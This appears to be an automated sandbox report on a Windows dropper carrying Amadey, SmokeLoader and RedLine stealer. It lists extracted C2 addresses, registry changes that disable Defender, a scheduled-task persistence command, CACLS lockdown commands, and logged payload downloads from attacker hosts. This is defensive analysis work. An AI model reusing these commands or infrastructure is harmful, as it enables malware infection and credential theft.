Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2023, 05:05 UTC
Static task
static1
Behavioral task
behavioral1
Sample
18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe
Resource
win10v2004-20230703-en
General
-
Target
18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe
-
Size
515KB
-
MD5
2713efc00ee4e2b81df83b02d249febd
-
SHA1
db821b0690130755ea9f5880df274ab022b93576
-
SHA256
18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804
-
SHA512
2663280fba3c0053a1542cf92689d6bb6ee940b93aa06bc70f04852ad6021490613a761e6595ec9392f2fa56ffedce65de34f633e1dba3b297d2bb74921fa656
-
SSDEEP
12288:RMrXy90BBiV4/hszGozvXdhXxXPZXcXFKWd0flP:KyuY4uzGozvXHXxf1CKM0flP
Malware Config
Extracted
amadey
3.85
77.91.68.3/home/love/index.php
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
news
77.91.68.68:19071
-
auth_value
99ba2ffe8d72ebe9fdc7e758c94db148
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/files/0x00070000000231ee-155.dat healer behavioral1/files/0x00070000000231ee-156.dat healer behavioral1/memory/4112-157-0x00000000003A0000-0x00000000003AA000-memory.dmp healer -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection a4907995.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a4907995.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a4907995.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a4907995.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a4907995.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a4907995.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation b8908653.exe Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation danke.exe Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation F0E3.exe -
Executes dropped EXE 10 IoCs
pid Process 3560 v7345389.exe 4996 v7083053.exe 4112 a4907995.exe 3500 b8908653.exe 2652 danke.exe 3456 c4646326.exe 4824 d5005589.exe 3660 danke.exe 3904 F0E3.exe 4796 danke.exe -
Loads dropped DLL 5 IoCs
pid Process 2396 rundll32.exe 4008 rundll32.exe 4008 rundll32.exe 4124 rundll32.exe 4124 rundll32.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" a4907995.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v7345389.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" v7345389.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v7083053.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" v7083053.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c4646326.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c4646326.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c4646326.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2120 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings F0E3.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4112 a4907995.exe 4112 a4907995.exe 3456 c4646326.exe 3456 c4646326.exe 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found 3124 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3124 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3456 c4646326.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4112 a4907995.exe Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found Token: SeShutdownPrivilege 3124 Process not Found Token: SeCreatePagefilePrivilege 3124 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3500 b8908653.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 4620 wrote to memory of 3560 4620 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe 86 PID 4620 wrote to memory of 3560 4620 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe 86 PID 4620 wrote to memory of 3560 4620 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe 86 PID 3560 wrote to memory of 4996 3560 v7345389.exe 87 PID 3560 wrote to memory of 4996 3560 v7345389.exe 87 PID 3560 wrote to memory of 4996 3560 v7345389.exe 87 PID 4996 wrote to memory of 4112 4996 v7083053.exe 88 PID 4996 wrote to memory of 4112 4996 v7083053.exe 88 PID 4996 wrote to memory of 3500 4996 v7083053.exe 96 PID 4996 wrote to memory of 3500 4996 v7083053.exe 96 PID 4996 wrote to memory of 3500 4996 v7083053.exe 96 PID 3500 wrote to memory of 2652 3500 b8908653.exe 99 PID 3500 wrote to memory of 2652 3500 b8908653.exe 99 PID 3500 wrote to memory of 2652 3500 b8908653.exe 99 PID 3560 wrote to memory of 3456 3560 v7345389.exe 100 PID 3560 wrote to memory of 3456 3560 v7345389.exe 100 PID 3560 wrote to memory of 3456 3560 v7345389.exe 100 PID 2652 wrote to memory of 2120 2652 danke.exe 101 PID 2652 wrote to memory of 2120 2652 danke.exe 101 PID 2652 wrote to memory of 2120 2652 danke.exe 101 PID 2652 wrote to memory of 2356 2652 danke.exe 103 PID 2652 wrote to memory of 2356 2652 danke.exe 103 PID 2652 wrote to memory of 2356 2652 danke.exe 103 PID 2356 wrote to memory of 2360 2356 cmd.exe 105 PID 2356 wrote to memory of 2360 2356 cmd.exe 105 PID 2356 wrote to memory of 2360 2356 cmd.exe 105 PID 2356 wrote to memory of 3224 2356 cmd.exe 106 PID 2356 wrote to memory of 3224 2356 cmd.exe 106 PID 2356 wrote to memory of 3224 2356 cmd.exe 106 PID 2356 wrote to memory of 2800 2356 cmd.exe 107 PID 2356 wrote to memory of 2800 2356 cmd.exe 107 PID 2356 wrote to memory of 2800 2356 cmd.exe 107 PID 2356 wrote to memory of 2328 2356 cmd.exe 108 PID 2356 wrote to memory of 2328 2356 cmd.exe 108 PID 2356 wrote to memory of 2328 2356 cmd.exe 108 PID 2356 wrote to memory of 3956 2356 cmd.exe 109 PID 2356 wrote to memory of 3956 2356 cmd.exe 109 PID 2356 wrote to memory of 3956 2356 cmd.exe 109 PID 2356 wrote to memory of 2436 2356 cmd.exe 110 PID 2356 wrote to memory of 2436 2356 cmd.exe 110 PID 2356 wrote to memory of 2436 2356 cmd.exe 110 PID 4620 wrote to memory of 4824 4620 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe 112 PID 4620 wrote to memory of 4824 4620 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe 112 PID 4620 wrote to memory of 4824 4620 18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe 112 PID 2652 wrote to memory of 2396 2652 danke.exe 120 PID 2652 wrote to memory of 2396 2652 danke.exe 120 PID 2652 wrote to memory of 2396 2652 danke.exe 120 PID 3124 wrote to memory of 3904 3124 Process not Found 122 PID 3124 wrote to memory of 3904 3124 Process not Found 122 PID 3124 wrote to memory of 3904 3124 Process not Found 122 PID 3904 wrote to memory of 4360 3904 F0E3.exe 123 PID 3904 wrote to memory of 4360 3904 F0E3.exe 123 PID 3904 wrote to memory of 4360 3904 F0E3.exe 123 PID 4360 wrote to memory of 4008 4360 control.exe 126 PID 4360 wrote to memory of 4008 4360 control.exe 126 PID 4360 wrote to memory of 4008 4360 control.exe 126 PID 4008 wrote to memory of 3360 4008 rundll32.exe 127 PID 4008 wrote to memory of 3360 4008 rundll32.exe 127 PID 3360 wrote to memory of 4124 3360 RunDll32.exe 128 PID 3360 wrote to memory of 4124 3360 RunDll32.exe 128 PID 3360 wrote to memory of 4124 3360 RunDll32.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe"C:\Users\Admin\AppData\Local\Temp\18b1ccd3458df66d85caf5b2607a13c597e87551e0aeb9dbca5439cdec04e804.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7345389.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7345389.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7083053.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v7083053.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a4907995.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a4907995.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8908653.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8908653.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F6⤵
- Creates scheduled task(s)
PID:2120
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2360
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:N"7⤵PID:3224
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:R" /E7⤵PID:2800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2328
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:N"7⤵PID:3956
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:R" /E7⤵PID:2436
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:2396
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c4646326.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c4646326.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d5005589.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d5005589.exe2⤵
- Executes dropped EXE
PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:3660
-
C:\Users\Admin\AppData\Local\Temp\F0E3.exeC:\Users\Admin\AppData\Local\Temp\F0E3.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OQp8s.CPl",2⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OQp8s.CPl",3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OQp8s.CPl",4⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\OQp8s.CPl",5⤵
- Loads dropped DLL
PID:4124
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:4796
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request71.31.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request2.136.104.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.154.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request57.169.31.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.1.85.104.in-addr.arpaIN PTRResponse198.1.85.104.in-addr.arpaIN PTRa104-85-1-198deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request59.128.231.4.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.3:80RequestPOST /home/love/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.3
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bfwitgpm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 203
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eyhcpamaq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 323
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request161.252.72.23.in-addr.arpaIN PTRResponse161.252.72.23.in-addr.arpaIN PTRa23-72-252-161deploystaticakamaitechnologiescom
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uenfaup.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 135
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
ETag: "16400-5ffd5f45b7dbc"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://joteuv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 297
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request64.13.109.52.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qyfkknxa.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 307
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bchoehfm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 298
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.30:80RequestGET /fuzz/raman.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.30
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 23 Jul 2023 04:40:05 GMT
ETag: "15cb9d-60120177e5340"
Accept-Ranges: bytes
Content-Length: 1428381
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request226.162.46.104.in-addr.arpaIN PTRResponse
-
515 B 365 B 6 5
HTTP Request
POST http://77.91.68.3/home/love/index.phpHTTP Response
200 -
260 B 5
-
1.5kB 842 B 9 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
260 B 5
-
718 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
3.9kB 94.8kB 75 74
HTTP Request
GET http://77.91.68.3/home/love/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.68.3/home/love/Plugins/clip64.dllHTTP Response
200 -
260 B 5
-
879 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
260 B 5
-
1.6kB 1.2kB 10 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
50.6kB 1.5MB 983 1056
HTTP Request
GET http://77.91.68.30/fuzz/raman.exeHTTP Response
200 -
260 B 5
-
260 B 5
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
71.31.126.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
240.221.184.93.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
2.136.104.51.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.154.82.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
57.169.31.20.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
198.1.85.104.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
59.128.231.4.in-addr.arpa
-
207 B 207 B 3 3
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
-
140 B 140 B 2 2
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
161.252.72.23.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
64.13.109.52.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
226.162.46.104.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
229KB
MD57ef5a9b615ada03bbe25c6b2970938ea
SHA1f6008e9159151a40fe29be4ebd7be33a129e6992
SHA25682467f2382809aad6f629b022aea038509dbc08f1e0b74b771c83aa0ebc7c901
SHA5125285896edbe770a434a905f09f925ad53498b8fa90948fbaeac82a4be6bbda45e5ca95d4ad0ae2fb9b56840510e30a96ed085fa46f840cef386388f84b318be8
-
Filesize
229KB
MD57ef5a9b615ada03bbe25c6b2970938ea
SHA1f6008e9159151a40fe29be4ebd7be33a129e6992
SHA25682467f2382809aad6f629b022aea038509dbc08f1e0b74b771c83aa0ebc7c901
SHA5125285896edbe770a434a905f09f925ad53498b8fa90948fbaeac82a4be6bbda45e5ca95d4ad0ae2fb9b56840510e30a96ed085fa46f840cef386388f84b318be8
-
Filesize
229KB
MD57ef5a9b615ada03bbe25c6b2970938ea
SHA1f6008e9159151a40fe29be4ebd7be33a129e6992
SHA25682467f2382809aad6f629b022aea038509dbc08f1e0b74b771c83aa0ebc7c901
SHA5125285896edbe770a434a905f09f925ad53498b8fa90948fbaeac82a4be6bbda45e5ca95d4ad0ae2fb9b56840510e30a96ed085fa46f840cef386388f84b318be8
-
Filesize
229KB
MD57ef5a9b615ada03bbe25c6b2970938ea
SHA1f6008e9159151a40fe29be4ebd7be33a129e6992
SHA25682467f2382809aad6f629b022aea038509dbc08f1e0b74b771c83aa0ebc7c901
SHA5125285896edbe770a434a905f09f925ad53498b8fa90948fbaeac82a4be6bbda45e5ca95d4ad0ae2fb9b56840510e30a96ed085fa46f840cef386388f84b318be8
-
Filesize
229KB
MD57ef5a9b615ada03bbe25c6b2970938ea
SHA1f6008e9159151a40fe29be4ebd7be33a129e6992
SHA25682467f2382809aad6f629b022aea038509dbc08f1e0b74b771c83aa0ebc7c901
SHA5125285896edbe770a434a905f09f925ad53498b8fa90948fbaeac82a4be6bbda45e5ca95d4ad0ae2fb9b56840510e30a96ed085fa46f840cef386388f84b318be8
-
Filesize
1.4MB
MD543b6a72c22494bf08a4553fb1c39e286
SHA1ab4a251f5f53c4e398ac1298607e9f0d7cb269e6
SHA256110e5c792005395e2df724ebe9cdb251b1753a2ed0de5bcaaf9de68533d8f598
SHA512c03978970ad1b4d89faa99e24598fd18bc2a5f640a2d25febd0beddada62af437143dafa62303f2389b19c67e854c78cda81fb2508b7e0c98b8f06709bb0c2c8
-
Filesize
1.4MB
